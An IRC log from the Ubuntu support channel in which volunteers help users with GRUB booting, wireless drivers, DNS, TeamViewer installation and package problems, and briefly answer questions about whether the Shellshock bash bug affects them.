[21:25] <sergio-br22> hey Jordan_U, i'm here
[21:25] <Jordan_U> The_Woodsman: Yes please.
[21:25] <k1l_> The_Woodsman: so the wifi internet is not working properly?!
[21:25] <Jordan_U> The_Woodsman: There may have been a recent DNS change that will just take a while to propagate, and has made it to your carrier's DNS server but not your ISP's.
[21:26] <Jordan_U> sergio-br2: OK. Press 'c' at the grub menu to get to the grub shell, if you're not there already.
[21:26] <The_Woodsman> Jordan_U: so it's definitely not a problem with the wifi, both my phone and another laptop on the network both connected to the site
[21:26] <sergio-br22> ok
[21:27] <The_Woodsman> daftykins: i ran an nslookup and it didn't hang or anything, what should i be looking for in it?
[21:27] <sergio-br2> ok, and now Jordan_U?
[21:27] <Jordan_U> sergio-br2: Then run "root=(hd0,gpt3)".
[21:28] <daftykins> The_Woodsman: try visiting http://IP of your domain/ instead of the domain
[21:28] <sergio-br2> ok
[21:28] <Jordan_U> sergio-br2: Then "chainloader /EFI/Microsoft/Boot/bootmgfw.efi". (You can use tab completion).
[21:28] <The_Woodsman> daftykins: doing 'http://mysite.org" worked - why is that? and thanks for the help btw
[21:29] <sergio-br2> ok
[21:29] <daftykins> The_Woodsman: instead of what? www.?
[21:29] <The_Woodsman> daftykins: yeah, previously i'd just do mysite.org
[21:29] <Jordan_U> sergio-br2: Did you get any error messsages?
[21:30] <sergio-br2> i think don't
[21:30] <Jordan_U> sergio-br2: OK. Try running "boot".
[21:30] <sergio-br2> error: unknown error
[21:30] <daftykins> The_Woodsman: sounds like your domain's DNS isn't quite right
[21:30] <sergio-br2> so, maybe the other file?
[21:30] <Jordan_U> sergio-br2: Wow, that's new. Please join #grub.
[21:31] <sergio-br2> ok
[21:31] <The_Woodsman> daftykins: interesting
[21:33] <Guest9752> I have installed Apache on Ubuntu and it is successfully running pages, but could you tell me who should be the owner and the group owner of files in /var/www / directory?
[21:33] <daftykins> actually i think its /var/www/html now, in ubuntu server 14.04
[21:34] <giomba> Guest9752: www-data
[21:34] <giomba> daftykins: yes, you're right, it's /var/www/html
[21:34] <Guest9752> giomba: www-data:www-data?
[21:35] <giomba> yes
[21:35] <daftykins> ^ yes
[21:35] <daftykins> but you only need to change what content you end up putting there
[21:35] <kneeoh> hello
[21:45] <Sathyrion> Evening folks! Cheers
[21:45] <CPUlli> sergio-br2: is there a file /etc/grub.d/40_custom ?
[21:46] <CPUlli> thanks
[21:47] <hichris123> Hmm, I'm getting errno 38 when using sigaction in C... which means function not implemented.
[21:48] <hichris123> Anyone here gifted enough to figure out why it's not implemented?
[21:48] <hichris123> The call is just "syscall("SYS_rt_sigaction");"
[21:50] <Jordan_U> hichris123: Why aren't you using #include <signal.h> and calling the sigaction function?
[21:51] <hichris123> Jourdan_U: I need some special features that it doesn't natively have.
[21:51] <hichris123> wait, should I be including sys/syscalls.h or sys/syscall.h?
[21:52] <Jordan_U> hichris123: What special features?
[21:52] <hichris123> Jourdan_U: heck if I know, it's chromium.
[21:52] <Jordan_U> hichris123: So this isn't your own code?
[21:53] <Jordan_U> hichris123: What is your end goal? What problem are you trying to solve?
[21:53] <hichris123> Jourdan_U: ish. I have it locally reproducible with my own code.
[21:53] <hichris123> ... I'm just trying to run & compile chromium?
[21:54] <daftykins> hichris123: we favour the packages, not compilation
[21:54] <hichris123> daftykins: sure, but I'm trying to submit a patch.
[21:55] <daftykins> to what?
[21:55] <hichris123> chromium
[21:55] <daftykins> a newer version than in repos?
[21:55] <hichris123> daftykins: yeah, like compiling from the CHROMIUM source. like https://chromium.googlesource.com/
[21:56] <daftykins> nice caps
[21:56] <hichris123> soo... any thoughts?
[21:57] <daftykins> nope
[21:58] <philAnderer> learn git
[21:59] <elvis4526> Hello I have an english-related question and I didn't know where to ask
[22:00] <elvis4526> Does "Proven that i'm hired I will... blabla" make sense in english ?
[22:00] <elvis4526> I want to say like if i'm hired i will do "this".
[22:00] <daftykins> no, also no it's not relevant here
[22:00] <elvis4526> :(
[22:00] <skinux> Are there any options for audible notifications of weather?
[22:01] <k1l_> elvis4526: try the chat channel #ubuntu-offtopic
[22:01] <elvis4526> thanks
[22:03] <thakyZ> Hello.
[22:03] <thakyZ> Can anyone help me with my issue?
[22:03] <daftykins> thakyZ: not until you describe it
[22:03] <thakyZ> is it ok if I post a link from the ubuntu forums for the description?
[22:04] <daftykins> yes
[22:04] <thakyZ> http://ubuntuforums.org/showthread.php?t=2245869
[22:04] <sudormrf> is there a way to display a sort of progress bar in the CLI when you use the cp or the mv command?
[22:06] <daftykins> thakyZ: is this a laptop or desktop?
[22:06] <thakyZ> Desktop
[22:06] <thakyZ> I had bought the network card separately
[22:06] <daftykins> thakyZ: can you position it near your router to get it online for installing packages etc?
[22:07] <thakyZ> no but I can download all the packages and put them on my external hard drives and transfer it over...
[22:07] <k1l_> sudormrf: you can use pv
[22:07] <Ladon> How would I give tmux the ability to run on boot? I have a script that I want to run @reboot and every 5 minutes that checks for a process that runs in tmux. It works perfectly when I execute it manually but fails when cron attempts to... I'm assuming because tmux expects a window to open and it doesn't.
[22:08] <k1l_> sudormrf: or "gcp" which includes a progressbar
[22:08] <sudormrf> k1l_, thanks :)
[22:08] <daftykins> thakyZ: give this a go http://askubuntu.com/questions/53136/realtek-8190-wireless-doesnt-work
[22:08] <sudormrf> k1l_, anything that is installed by default?
[22:08] <thakyZ> kk I'll respond back if it works or not...
[22:08] <k1l_> sudormrf: nautilus :)
[22:09] <MouseTheLuckyDog> I wanted to setup a vnc server on my desktop, to run dolphin, open and annotate pdf documents and run xournal remotely on my android device. I'm not sure which one to install though, seem there are a lot of choices.
[22:09] <daftykins> MouseTheLuckyDog: for local LAN use?
[22:09] <sudormrf> k1l_, looking for CLI utils
[22:10] <MouseTheLuckyDog> daftykins, yeah but over wifi.
[22:10] <k1l_> sudormrf: i know :)  but i dont know if something for the cli is preinstalled. just try it
[22:10] <sudormrf> it isn't a pita to install these things, just exploring all avenues :)
[22:12] <sudormrf> can be accomplished with rsync
[22:12] <sudormrf> should have done that
[22:12] <sudormrf> moving 800gb from one nas to another
[22:12] <sudormrf> it is going to take a long while
[22:12] <sudormrf> obviously.
[22:12] <k1l_> well. that is something i would do with rsync anyway
[22:12] <daftykins> ^
[22:12] <daftykins> i was going to suggest rsync but didn't know your task size
[22:13] <Sathyrion> Funny.. Didn't know TeamViewer had a native linux client. Now I can admin bot win and linux from wherever :)
[22:14] <daftykins> that's what SSH is for
[22:14] <squinty> Sathyrion:  fwiw, the linux version uses Wine
[22:14] <sudormrf> k1l_, yeah.  didn't think about it too much when I started the process.  just said mv x to y
[22:15] <pr0t> I am running Ubuntu in Kiosk mode, but I am trying to do some cleverness so that if there is not internet connection it will pop up wifi-radar, but wifi-radar lags and sometimes locks up when doing this, would anyone know a more efficent way to do this?
[22:15] <hichris123> philAnderer: uh what?
[22:15] <Sathyrion> Squinty: Yeah, I've noticed just now
[22:15] <sudormrf> daftykins, rsync is what I should have gone with.  oh well. :D
[22:15] <sudormrf> it is going to take a couple of days I am sure
[22:15] <kostkon> Sathyrion, works quite well though
[22:15] <hichris123> daftykins: thanks for that *extreme* help. I appreciated it.
[22:15] <daftykins> hichris123: no need to be sarcastic
[22:15] <Sathyrion> Yeah, just tested from both android and iphone. Works as intended
[22:16] <sudormrf> too late now :D
[22:16] <sudormrf> Sathyrion, tested what?
[22:16] <Sathyrion> sudomrf: TeamViewer
[22:17] <sudormrf> Sathyrion, oh.  the client doesn't look linux native
[22:17] <sudormrf> looks like it is running in wine
[22:17] <Sathyrion> It's wine
[22:17] <sudormrf> yeah
[22:17] <thakyZ> hey daftykins where would the ~\rtl8190 be located?
[22:17] <Sathyrion> The offer a linux download, but it's wine. Didn't notice any info on their site stating it's run under wine..
[22:18] <sudormrf> Sathyrion, nor I
[22:18] <daftykins> thakyZ: ~ means /home/username/
[22:18] <sudormrf> I use it to troubleshoot the rents computers
[22:18] <thakyZ> thanks...
[22:18] <daftykins> sudormrf: this is not a channel for general chat, you come here often enough to know this.
[22:18] <Sathyrion> But doesn't matter. Runs well enough. yet... :P
[22:18] <sudormrf> heh.  sorry.
[22:20] <thakyZ> @daftykins it says when I do sudo ndiswrapper -i net8190.inf it says couldn't open net8190.inf: No such file or directory at /usr/sbin/ndiswrapper-1.9
[22:21] <daftykins> thakyZ: you installed ndiswrapper at this point, yes?
[22:22] <thakyZ> hey daftykins never mind i fixed it it was a spelling mistake
[22:22] <thakyZ> and yes I have
[22:22] <daftykins> \o/
[22:22] <metempsychosis> oh. my. god. In an effort to fix my video card, I reinstalled kubuntu on my new ssd and now I get a blinking cursor. reformatted the flash drive with a new installer, new image, etc, nothing works, still blinking cursor
[22:22] <metempsychosis> *blinking cursor on startup that is
[22:23] <sudormrf> question about evolution and ews
[22:23] <daftykins> !nomodeset | metempsychosis
[22:23] <Jordan_U> metempsychosis: Try changing the boot order in your BIOS (assuming this isn't a UEFI based machine).
[22:23] <sudormrf> I enter my info, it recognizes our exchange instance, but it never populates mail.  I have tried multiple times to re-add the account to be able to mess with account settings and it never shows up.  suggestions?
[22:24] <metempsychosis> dafty: thanks Ill try that out. jordan: I checked the boot order and the SSD is first
[22:25] <Jordan_U> metempsychosis: Try changing the boot order so that it boots from the HDD instead then.
[22:26] <metempsychosis> the hdd isn't an option. it doesn't have anything bootable on it, it's just storage now
[22:26] <metempsychosis> dafty: Im not sure what to do with this information. is it in the BIOS settings?
[22:27] <asher1> please i need help i try install Teamviewer in ubuntu 14.4 and i see error
[22:27] <daftykins> metempsychosis: hold left shift just before it's about to read from the SSD to boot, see if you get a GRUB menu
[22:27] <wolflarson> asher1, did you install teamviewer from the software center ?
[22:28] <asher1> no i try from terminal
[22:28] <asher1> from here
[22:28] <sudormrf> evolution doesn't have an irc channel?
[22:28] <asher1> http://www.tecmint.com/how-to-install-teamviewer-on-linux-distributions/
[22:28] <Blaster> I'm trying to get an upstart to work and I added a .conf file to my /etc/init directory, but when I run `service app stop` it was unknown instance.  Even if I start it (which seems to work).
[22:28] <metempsychosis> no grub menu
[22:28] <thakyZ> so daftykins it says in the additional drivers page that there is none, and it still says ethernet so what do I do?
[22:28] <metempsychosis> excuse me for one moment, just ordering food
[22:28] <wolflarson> Blaster, did you try turnning it off and on again?
[22:29] <Blaster> wolflarson, when I start it, it says app start/running, process 8884.
[22:29] <daftykins> thakyZ: did you restart as suggested?
[22:29] <Blaster> wolflarson, when I try to stop, it says unknown instance.
[22:29] <kostkon> asher1, just download the deb from the teamviewer webiste and double click on it
[22:29] <genii> sudormrf: Their channel is on gimp.org and not freenode
[22:29] <Jordan_U> metempsychosis: Try changing the boot order in your BIOS (assuming this isn't a UEFI based machine). Please just trust me on this.
[22:29] <wolflarson> asher1, what error are you getting?
[22:29] <sudormrf> genii, thanks
[22:30] <Seannie> so sure, any system is an open system eventually, but this bash thing, an exploit that has existed since what are they saying 10.04 is only now being patched... did i read that wrong?
[22:30] <asher1> something download
[22:31] <daftykins> Seannie: this is not a place for general chat
[22:31] <k1l_> asher1: we can help you more effective if you can provide exact error messages and infos. use pastebin if its more lines
[22:31] <daftykins> Seannie: feel free to talk about how upset you are with open source in #ubuntu-offtopic
[22:31] <asher1> one sec i connect from there
[22:31] <thakyZ> I am trying that now
[22:32] <mircx> hey
[22:32] <thakyZ> no daftykins it isn't working still...
[22:32] <mircx> this my problem i see from install
[22:33] <daftykins> thakyZ: do you see an interface other than eth0 and lo, if you run "ifconfig -a" in a terminal?
[22:33] <mircx> dpkg: error processing package teamviewer9 (--install): dependency problems - leaving unconfigured
[22:33] <mircx> Errors were encountered while processing: teamviewer9
[22:33] <l2ksolkov> How would i share my wifi connection via eth0? I've googled it and the guides make zero sense.
[22:34] <daftykins> l2ksolkov: via network manager, if this is standard ubuntu
[22:34] <thakyZ> no command ipconfig' found,
[22:34] <Jordan_U> l2ksolkov: In nm-connection-editor configure your ethernet interface as "Shared to other computers". That's all that should be needed.
[22:34] <daftykins> thakyZ: typo, "ifconfig -a"
[22:34] <asher1> mircx
[22:34] <asher1> this me
[22:34] <thakyZ> oh opps
[22:34] <metempsychosis> ok changing boot order now
[22:34] <asher1> i paste the error
[22:34] <thakyZ> sorry I am used to the windows 'ipconfig'
[22:34] <daftykins> mircx: share output by pasting to paste.ubuntu.com - not pasting to channel
[22:34] <daftykins> thakyZ: i thought as much :) no problem
[22:34] <asher1> ok
[22:35] <thakyZ> no I dont see anything other than those
[22:35] <daftykins> thakyZ: anything from "ndiswrapper -l" ?
[22:36] <mircx> ok
[22:36] <mircx> this the error
[22:36] <metempsychosis> my boot devices: SSD, USB Installer, CDROM. what order should I have them in?
[22:36] <mircx> http://paste.ubuntu.com/8436197/
[22:36] <metempsychosis> currently the SSD is first
[22:36] <Jordan_U> metempsychosis: You don't have a non-ssd internal hard drive?
[22:36] <daftykins> mircx: grab the 32-bit instead
[22:36] <thakyZ> it says net819xp : driver installed \n device (10EC:8190) present
[22:36] <mircx> what is mean?
[22:36] <metempsychosis> I do but it has nothing installed on it that's bootable
[22:37] <daftykins> mircx: go to teamviewer.com and download '32-bit' instead.
[22:37] <metempsychosis> should I install kubuntu on it as well then? would that help?
[22:37] <Jordan_U> metempsychosis: Set your non SSD hard drive as first in the boot order.
[22:37] <metempsychosis> it's not available for booting. only those three are listed
[22:37] <asher1> daftykins
[22:37] <asher1> mircx this me
[22:37] <asher1> i from there
[22:37] <asher1> for paste error
[22:37] <Jordan_U> metempsychosis: It's likely that grub's boot sector and core.img are embedded in the MBR and post MBR gap of the HDD.
[22:37] <daftykins> asher1: stop pressing enter so much
[22:38] <daftykins> asher1: your english doesn't make any sense
[22:38] <daftykins> thakyZ: that sounds good, like it should work
[22:38] <asher1> maybe you can please give to me link?
[22:38] <daftykins> asher1: no, i will not visit teamviewer.com for you
[22:38] <metempsychosis> I have an idea then: maybe I should reinstall kubuntu once more with the hdd unplugged so such a thing doesn't happen? that's how I had installed it the first time (accidentally)
[22:38] <daftykins> thakyZ: can you run "sudo modprobe ndiswrapper" ?
[22:38] <Jordan_U> metempsychosis: OK, I was hoping that we could boot Ubuntu normally to install grub properly to the SSD, but instead let's do it from a liveUSB. Please boot from the Ubuntu LiveUSB, run boot info script, then pastebin the RESULTS.txt it produces.
[22:39] <Jordan_U> !bootinfo | metempsychosis
[22:39] <k1l_> asher1: are you running a 32bit or 64bit ubuntu?
[22:39] <asher1> no for me only to know where i can download for ubuntu 14
[22:39] <thakyZ> ya hold
[22:39] <asher1> 64 bit
[22:39] <metempsychosis> kk will do. one moment.
[22:39] <k1l_> asher1: so install the 2 packages that are mentioned in the error message
[22:39] <daftykins> thakyZ: after that, try "ifconfig -a" again and see if you have a new interface now
[22:39] <thakyZ> modprobe: FATAL: Module ndiswrapper not found
[22:39] <asher1> yes
[22:39] <asher1> i paste from mircx the error
[22:40] <k1l_> asher1: yes, read it. it says what the problem is
[22:40] <thakyZ> nope still not working...
[22:40] <daftykins> thakyZ: hmm, do you need "sudo depmod -a" first maybe?
[22:40] <asher1> what problem?
[22:40] <k1l_> for more info read this: http://www.teamviewer.com/en/help/363-How-do-I-install-TeamViewer-on-my-Linux-distribution.aspx   asher1
[22:41] <vitimiti> hi
[22:41] <thakyZ> It just returns with nothing...
[22:41] <asher1> ok thanks
[22:41] <asher1> k1l_
[22:41] <reisio> vitimiti: heya
[22:41] <daftykins> thakyZ: yeah that above command won't give any output
[22:41] <thakyZ> and then what command after it?
[22:42] <vitimiti> hi, reisio
[22:42] <l2ksolkov> daftykins, Jordan_U , windows is unable to connect with it even though it's shared.
[22:42] <Jordan_U> metempsychosis: If boot info script shows that the problem is that grub's boot sector is installed to the wrong drive, you can install grub to the correct drive by following: https://help.ubuntu.com/community/Grub2/Installing#via_ChRoot
[22:42] <k1l_> asher1: hint: README or "howto install" from the one who made that .deb are actually worth reading. it mentions exactly your issue: In case “dpkg” indicates missing dependencies, complete the installation by executing the following command:  apt-get install -f
[22:42] <daftykins> l2ksolkov: does it have an IP on your real network?
[22:43] <daftykins> thakyZ: back to "sudo modprobe ndiswrapper"
[22:43] <thakyZ> ya I tried and it still errored
[22:43] <l2ksolkov> daftykins, real word ip or internal?
[22:43] <daftykins> thakyZ: ugh, ok - hmm
[22:44] <daftykins> l2ksolkov: one of your internal network, presumably the PC connected to wifi is behind a router
[22:44] <thakyZ> do I need ndisgtk_0,8,5-1_amd64.deb?
[22:44] <asher1> ok
[22:44] <l2ksolkov> daftykins, it has an internal ip, 192.168.1.106
[22:45] <daftykins> l2ksolkov: so what goes wrong? can you ping the PC with wifi? can you ping the router? can you ping 8.8.8.8?
[22:46] <l2ksolkov> daftykins,  No, windows says the network has no connection and there's no default gateway listed in ipconfig.
[22:47] <daftykins> thakyZ: did you install the package name the guide suggested, or the one you just mentioned?
[22:47] <daftykins> l2ksolkov: configure it
[22:47] <thakyZ> the one it suggested
[22:47] <Jordan_U> l2ksolkov: How are you connecting your Ubuntu machine to your Windows machine?
[22:48] <l2ksolkov> Jordan_U, the Ubuntu machine is connected via wifi and I'm sharing the connection with eth0 via Ethernet cable
[22:48] <Jordan_U> l2ksolkov: So you have a crossover cable connected between the two computers?
[22:48] <daftykins> crossover cables haven't been necessary for a billion years
[22:48] <Sathyrion> Hi, How do I fix this from "sudo apt-get update"?: W: Duplicate sources.list entry http://dl.google.com/linux/chrome/deb/ stable/main amd64 Packages (/var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_Packages)
[22:49] <c_smith> anyone know if there's a way to sync music to an iphone running iOS 8? Apple pulled the plug on signing iOS 7.x.x ispws, so tone can't downgrade and jailbreak.
[22:49] <daftykins> Sathyrion: delete one...
[22:49] <daftykins> !ipod | c_smith beyond this, no ideas regarding iOS 8 - likely no...
[22:50] <l2ksolkov> Jordan_U, i run a standard cat 5(e) cable, not crossover.
[22:50] <Jordan_U> l2ksolkov: And these are both relatively modern machines?
[22:50] <c_smith> that sucks..... I've been trying to downgrade only to find out Apple pulled the plug.
[22:50] <Jordan_U> l2ksolkov: Please pastebin the output of "nm-tool".
[22:50] <kostkon> Sathyrion, did you manually add the chrome repo?
[22:51] <Emma2> hi
[22:51] <daftykins> hello.
[22:51] <Emma2> bro
[22:51] <Emma2> where are u from??
[22:51] <k1l_> !ot | Emma2
[22:51] <daftykins> this is not a chat channel, please take your chat to ^
[22:52] <Sathyrion> kostkon: Yes. I installed the beta to run netflix, but the first install failed. now I get this
[22:52] <damidam> Hey my microphone sound is cracking in ubuntu 14.04 does anyone know how to fix this ? I tried everything I could find on google :/
[22:52] <Emma2> i don't know how to use this
[22:52] <daftykins> Jordan_U: you can have this one, but it's getting very annoying how you tread all over my toes on 'tickets' i've respondes to already.
[22:52] <daftykins> *responded
[22:52] <kostkon> Sathyrion, oh ok
[22:52] <Emma2> ??
[22:52] <daftykins> Emma2: leave this channel. it is for _ubuntu support_ only
[22:52] <kostkon> Sathyrion, then it managed to add the repo before failing that's why you've got two entries now
[22:52] <l2ksolkov> Jordan_U, http://paste.ubuntu.com/8436304/
[22:53] <Sathyrion> kostkon: Ok, how do I fix this? and/or how do I remove it? I have same error on both i386 and x86
[22:53] <Emma2> hey
[22:53] <daftykins> l2ksolkov: ah, so the things you told me were wrong.
[22:53] <Sathyrion> kostkon: amd64*
[22:54] <Emma2> are you anonymous??
[22:54] <daftykins> !ops | Emma2
[22:54] <kostkon> Sathyrion, either using the terminal or opening your software updater, clicking on Settings then on the 3rd party or whatever is called tab
[22:54] <daftykins> troll eviction please.
[22:54] <phunyguy> Hello
[22:54] <k1l_> Emma2: this is not the right channel for that. please go to #ubuntu-offtopic if you want to chat
[22:54] <phunyguy> Emma2: can we help you with something?
[22:54] <kostkon> probably a bot
[22:54] <Sathyrion> kostkon: term please :)
[22:54] <Emma2> help me
[22:54] <l2ksolkov> daftykins, how so? I'm bad at describing things over the Internet, sorry!
[22:55] <Emma2> idon't use this
[22:55] <daftykins> k1l_: please just do what is necessary
[22:55] <daftykins> it's clearly not a productive member of society
[22:55] <kostkon> Sathyrion, gui is faster ;)
[22:55]  * rww looks up
[22:55] <phunyguy> Emma2: then stop talking.  This is an official support channel.  Please type /join #ubuntu-offtopic for general chat.
[22:55] <damidam> Hey my microphone recording is cracking in ubuntu 14.04 does anyone know how to fix this ? I tried everything I could find on google :/
[22:55] <old_penguin> Hello all, are ubuntu desktop users vulnerable to the Shellshock Bash vulnerability?
[22:56] <daftykins> old_penguin: yes
[22:56] <k1l_> old_penguin: not if they run the updates
[22:56] <Jordan_U> l2ksolkov: Please post screenshot of the network-manager applet dropdown.
[22:56] <Sathyrion> kostkon: Thanks fixed ny term :)
[22:56] <l2ksolkov> Jordan_U, IPv4 or 6?
[22:56] <kostkon> old_penguin, but they are much less so when they are up-to-date
[22:56] <Sathyrion> it by*
[22:56] <old_penguin> I just did an update this morning.  I think it contained a bash update.
[22:56] <kostkon> Sathyrion, good job :)
[22:56] <Jordan_U> l2ksolkov: ip4 for now.
[22:56] <l2ksolkov> Jordan_U, or the one in the top right corner?
[22:56] <k1l_> !shellstorm | old_penguin
[22:57] <Jordan_U> l2ksolkov: Yes, the one at the top corner.
[22:57] <k1l_> !shellshock | old_penguin
[22:57] <Sathyrion> kostkon: wasn't a problem, just very irretating :P
[22:57] <kostkon> Sathyrion, yeap
[22:57] <old_penguin> Thanks for everyones quick responses.
[22:57] <Guido1> hello, I have a litle problem with my LEFT CTRL key. CTRL + U, CTRL + I  etc. works, but not for example CTRL + S, CTRL + B and CTRL + P. In the beginning it worked so it might be related to an update. What can I do?
[22:58] <thakyZ> daftykins: I couldn't install pythin-glade2 because it doesn't support the version of phython-gtk2 installed by default on the OS
[22:58] <geirha> Guido1: Where?
[22:59] <metempsychosis> okay so I just straight up unplugged my hdd, reformatted and it's running fine now. I was having trouble with that boot diagnostic thing but this cleared it up anyway. thanks for your help!
[22:59] <Guido1> geirha: you mean program? everywere - libre office, seamonkey, mousepad, ...
[23:00] <Jordan_U> metempsychosis: "Reformatted" meaning re-installed Ubuntu?
[23:00] <metempsychosis> yep!
[23:02] <l2ksolkov> Jordan_U, I'm confused on what one you want, the Network Manager window or the applet in the corner that you click on?
[23:02] <Jordan_U> l2ksolkov: The applet in the corner that you click on.
[23:02] <metempsychosis> see you all later, thanks again
[23:06] <wolfspy> hi, i'm getting screen tearing with videos in vlc and SMPlayer. I have intel integrated graphics. How do I fix it? I'm on ubuntu 12 LTS
[23:07] <daftykins> wolfspy: which kernel?
[23:07] <wolfspy> daftykins, how do I check?
[23:07] <daftykins> "uname -r"
[23:07] <wolfspy> daftykins, 3.2.0-51-generic
[23:08] <l2ksolkov> Jordan_U, how would i take a screenshot of it? using print screen button doesn't work.
[23:08] <daftykins> wolfspy: you should consider running the trusty HWE (hardware enablement stack)
[23:08] <daftykins> wolfspy: or just upgrade to 14.04
[23:08] <l2ksolkov> Jordan_U, gnome-screenshot is missing.
[23:09] <Guido1> No idea about my CTRL problem? (with the right CTRL key it works) or thinking about it?
[23:10] <daftykins> Guido1: test in a clean user account
[23:11] <Guido1> daftykins: moght the gust account work?
[23:11] <daftykins> Guido1: that could be a worthy test, yeah
[23:11] <Guido1> daftykins: or how do i make a new account and how do i remove it afterwards?
[23:11] <daftykins> system settings, users/accounts
[23:11] <daftykins> pretty simple
[23:12] <l2ksolkov> Jordan_U, my bad, let me take it now.
[23:14] <Guido1> same problem
[23:14] <daftykins> Guido1: next step is live session
[23:14] <Guido1> daftykins: you mean reboot from cd or flash
[23:15] <daftykins> boot from, yeah
[23:15] <l2ksolkov> Jordan_U, http://snag.gy/WSkLj.jpg
[23:16] <Guido1> daftykins: nothing else i could try first?
[23:16] <Guido1> the gust session looked like a live sesion
[23:16] <justaguy> Ubuntu 14.04, just wanted to update, was expecting 4 updates, but no, 1190 upgraded, 0 newly installed, 0 to remove and 412 not upgraded.
[23:16] <justaguy> Why so much suddenly o_O
[23:16] <daftykins> Guido1: right but it had whatever system wide antics you did to it :)
[23:17] <k1l_> justaguy: since when?
[23:17] <Guido1> daftykins: like updates you mean
[23:17] <daftykins> Guido1: and more. if you aren't up for doing a live session, nevermind
[23:17] <justaguy> k1l_: sigh, another PEBKAC, because of my aborted upgrade some hours ago, it still has "utopic" in it's /etc/apt/sources.list
[23:17] <justaguy> héhéhé
[23:17] <k1l_> justaguy: and did you add some PPAs or something like that?
[23:18] <designbybeck__> in Ubuntu 14.04 64bit, my Intous4, doesn't plug and play, I have to reboot to get it to work. ANyone else have this prob?
[23:18] <Guido1> daftykins: just some programs are running ...
[23:18] <k1l_> justaguy: what? that sounds like a big mess there
[23:18] <daftykins> Guido1: sorry, effort is required to diagnose issues
[23:18] <justaguy> k1l_: yeah, i aborted the progress while it was downloading and now it's messed up ^^
[23:19] <Guido1> daftykins: depends a bit on the program - some you can kill, some not. that's why i hoped for other steps.
[23:22] <daftykins> Guido1: right well you are responsible for that, i gave you the method.
[23:24] <Guido1> will do that, if i find my USB stick - also misssing :-S
[23:24] <Guido1> but what can i do to fix it? in the beginning it worked
[23:24] <damidam> Fixed it myself. If audio recordings are cracking for someone - disable the microphone boost in "sound" ;)
[23:24] <damidam> thanks anyways
[23:24] <damidam> take care
[23:24] <justaguy> k1l_: fixed :)
[23:25] <FutureSuture> Any AMD users? Please make yourselves heard: http://www.gamingonlinux.com/articles/a-message-from-john-byrne-of-amd-a-survey.4368
[23:25] <FutureSuture> AMD is finally giving us an opportunity to make ourselves heard with regard to their driver quality.
[23:25] <FutureSuture> Radeon > Catalyst for Linux in my opinion.
[23:27] <TheGhost> ls
[23:27] <TheGhost> clear
[23:27] <TheGhost> ls
[23:27] <Guido1> daftykins: will do that, if i find my USB stick - also misssing :-S
[23:27] <Guido1> but what can i do to fix it? in the beginning it worked
[23:27] <Guido1> USB stick found - have to make it ready
[23:27] <TheGhost> salut
[23:27] <TheGhost> salut a tous
[23:28] <FutureSuture> People, heed my plea! D:
[23:28] <daftykins> FutureSuture: not in here thanks
[23:28] <daftykins> Guido1: i'm not interested in taking the conversation along until the issue has been isolated
[23:28] <TheGhost> what up ??
[23:29] <OerHeks> FutureSuture, please don't, this is ubuntu support only
[23:29] <k1l_> TheGhost: ubuntu support "is up"
[23:29] <TheGhost> yes
[23:29] <FutureSuture> Support only? Where can one discuss matters related to Ubuntu and Linux in general, then, OerHeks?
[23:30] <k1l_> FutureSuture: #ubuntu-offtopic
[23:30] <daftykins> ##linux - ##ubuntu-offtopic
[23:30] <TheGhost> ho
[23:30] <k1l_> TheGhost: same for you
[23:30] <FutureSuture> Thanks ^_^
[23:30] <daftykins> TheGhost: if you have a support question, ask it.
[23:30] <TheGhost> thanks
[23:30] <Guido1> daftykins: yes, but how do i isolate it? live cd. vs now seams not to be very isolated
[23:30] <TheGhost> exit
[23:31] <daftykins> Guido1: then you do not understand, sorry but you're on your own.
[23:32] <Seannie> @daftykins ty
[23:33] <damidam> hey guys - I removed a program (yacreader) with autoremove. Now my wine dependencies etc are missing. How do I reinstall my missing dependencies ?
[23:33] <BarnacleBob> is there something up with the package mirrors on ec2 right now?  i suddenly am getting signature verification failures
[23:33] <OerHeks> damidam, reinstall wine i guess
[23:33] <deadevilboy> ppl, in an apache local server I have a website
[23:34] <damidam> why did it remove my wine stuff in the first place ?
[23:34] <deadevilboy> imagine the user asks for https://localhost ... everything goes smooth. However, If they use https://localhost, then u have the certificate "risk" msg
[23:34] <OerHeks> damidam, wine issues.. i guess yacreader is responsible
[23:34] <daftykins> BarnacleBob: we don't support amazon's products
[23:35] <deadevilboy> how can I redirect Https dns requests to http on the local machine?
[23:35] <daftykins> deadevilboy: pretty sure they won't enter a comma
[23:35] <OerHeks> !wine
[23:35] <Daekdroom> !13.04
[23:35] <BarnacleBob> daftykins, sorry i mean the mirror thats failing is: GPG error: http://us-east-1.ec2.archive.ubuntu.com precise Release: The following signatures couldn't be verified because the public key is not available
[23:36] <daftykins> BarnacleBob: maybe amazon changed something, hit up their support
[23:36] <damidam> OerHeks is there no way to reinstall all needed dependencies ?
[23:38] <BarnacleBob> daftykins, im pretty sure ubuntu maintains those package archives, but in any case if there isn't something globally wrong with signature verification then that answers my question
[23:38] <OerHeks> damidam, reinstall wine, sudo apt-get --reinstall install wine
[23:38] <BarnacleBob> where does apt store the keys to verify apt sources?
[23:40] <damidam> yeah that worked thanks
[23:40] <damidam> playonlinux works again
[23:41] <genii> BarnacleBob: All the filepaths are listed at the end of the manpage for apt-key
[23:41] <BarnacleBob> genii, thanks
[23:46] <huhlig> so I am feeling particularly dumb right now. what package in ubuntu contains the modern opengl headers. GL/glcorearb.h etc
[23:47] <reisio> huhlig: ask apt-file
[23:48] <genii> huhlig: Alternately, http://packages.ubuntu.com/search?searchon=contents&keywords=glcorearb.h&mode=exactfilename&suite=trusty&arch=any
[23:48] <huhlig> errr
[23:48] <huhlig> why does it only exist in the windows cross compiler
[23:52] <asakapab0i> whats up with the bug in bash?
[23:53] <sexyboy> asakapab0i: shellshock
[23:53] <daftykins> asakapab0i: it got patched, nothing to see here, move along
[23:54] <sexyboy> the issue is that it got discovered before it was used
[23:55] <sexyboy> now i'd like to know how to check was my machine used as a wopbot component
[23:56] <asakapab0i> mmk nice to know gotta patch up mine.
[23:56] <sexyboy> i mean, it got discovered after it was used
[23:57] <sexyboy> after wopbot started plundering the internet
[23:57] <Guido1> the problem remains with live CD
[23:57] <asakapab0i> sexyboy: Can I have the official link to this bug?
[23:57] <sexyboy> you can read about it on wikipedia
[23:57] <asakapab0i> What's this bug called?
[23:57] <sexyboy> it pretty much covers most of stuff we know about the bag for now
[23:58] <sexyboy> shellshock
[23:58] <OerHeks> !shellshock
[23:58] <asakapab0i> Yeah thanks!
[23:58] <sexyboy> s/bag/bug/